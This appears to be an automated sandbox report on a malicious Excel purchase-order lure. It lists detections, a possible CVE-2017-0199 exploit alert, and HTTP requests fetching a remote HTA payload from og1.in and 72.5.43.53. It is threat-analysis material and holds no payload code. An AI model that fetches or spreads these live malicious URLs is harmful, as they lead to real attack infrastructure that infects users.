Windows Analysis Report
PO554830092024.xls

Overview

General Information

Sample name: PO554830092024.xls
Analysis ID: 1522510
MD5: 1edb633bd6cace0251cdce53c9ebb66a
SHA1: 086134a30e3fcf793078432a88bd07a3e2c4782d
SHA256: 46463f97518091c911a730c5d2d04d1dcfc8d5ed972760983af6a33375567aba
Tags: xlsuser-abuse_ch

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Document contains embedded VBA macros
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

AV Detection

Source: PO554830092024.xls Virustotal: Detection: 23%
Source: PO554830092024.xls ReversingLabs: Detection: 34%
Source: PO554830092024.xls Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: global traffic DNS query: name: og1.in

Networking

Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 72.5.43.53:80
Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 72.5.43.53:80
Source: Joe Sandbox View ASN Name: UNASSIGNED UNASSIGNED
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic HTTP traffic detected: GET /ojmkcb HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /450/ne/IEnetworkprojectupdate.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 72.5.43.53Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6B20EFA4.emf
Source: global traffic DNS traffic detected: DNS query: og1.in
Source: PO554830092024.xls, 6B630000.0.dr String found in binary or memory: https://og1.in/ojmkcb
Source: unknown Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49161

System Summary

Source: PO554830092024.xls OLE: Microsoft Excel 2007+
Source: 6B630000.0.dr OLE: Microsoft Excel 2007+
Source: PO554830092024.xls OLE indicator, VBA macros: true
Source: classification engine Classification label: mal64.winXLS@1/8@1/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\6B630000
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR820A.tmp
Source: PO554830092024.xls OLE indicator, Workbook stream: true
Source: 6B630000.0.dr OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: 6B630000.0.dr Initial sample: OLE indicators vbamacros = False
Source: PO554830092024.xls Initial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: PO554830092024.xls Stream path 'Workbook' entropy: 7.99951239633 (max. 8.0)
Source: 6B630000.0.dr Stream path 'Workbook' entropy: 7.99939820191 (max. 8.0)